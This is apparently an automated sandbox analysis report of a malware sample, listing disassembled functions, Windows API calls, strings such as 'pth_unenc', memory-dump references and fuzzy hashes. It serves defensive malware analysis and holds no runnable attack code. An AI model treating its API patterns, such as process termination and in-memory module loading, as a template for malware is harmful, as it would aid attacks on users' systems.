                                • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                • Opcode Fuzzy Hash: f934f2a7f97c34cec8605a65b064942ce57b78f2774506a061fea1d29b3ee07f
                                • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043C1C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00449A5C: DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046EB30,00000010,0043C1D5), ref: 00449ABE
                                  • Part of subcall function 00449A5C: _free.LIBCMT ref: 00449ACC
                                  • Part of subcall function 00449AFC: _free.LIBCMT ref: 00449B1E
                                • DeleteCriticalSection.KERNEL32(006B3DC0), ref: 0043C1F1
                                • _free.LIBCMT ref: 0043C205
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$CriticalDeleteSection
                                • String ID: =k
                                • API String ID: 1906768660-1421436146
                                • Opcode ID: e906819441e1cb781d28dd4a1ea52947b9d71dae153e88ad857ccbc322e7c3cc
                                • Instruction ID: 43a050214315618beeb9c81765b0605937ca417edd614e55d144c525631042cd
                                • Opcode Fuzzy Hash: e906819441e1cb781d28dd4a1ea52947b9d71dae153e88ad857ccbc322e7c3cc
                                • Instruction Fuzzy Hash: 69E04F329145108FEB717F6AFD8595A73E49B4D325B11082FFC0DA316ACA6DAC809B8D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • __Init_thread_footer.LIBCMT ref: 00410F29
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: ,kG$0kG
                                • API String ID: 1881088180-2015055088
                                • Opcode ID: f9f143b1e95ac96eb86707cb7474d167dbc7ad60067a617d51a8135112e2f0db
                                • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                • Opcode Fuzzy Hash: f9f143b1e95ac96eb86707cb7474d167dbc7ad60067a617d51a8135112e2f0db
                                • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00412850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ObjectProcessSingleTerminateWait
                                • String ID: pth_unenc
                                • API String ID: 1872346434-4028850238
                                • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                • GetLastError.KERNEL32 ref: 00440D35
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorLast
                                • String ID:
                                • API String ID: 1717984340-0
                                • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                Download Yara Rule
                                APIs
                                • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastRead
                                • String ID:
                                • API String ID: 4100373531-0
                                • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
                                Uniqueness

                                Uniqueness Score: -1.00%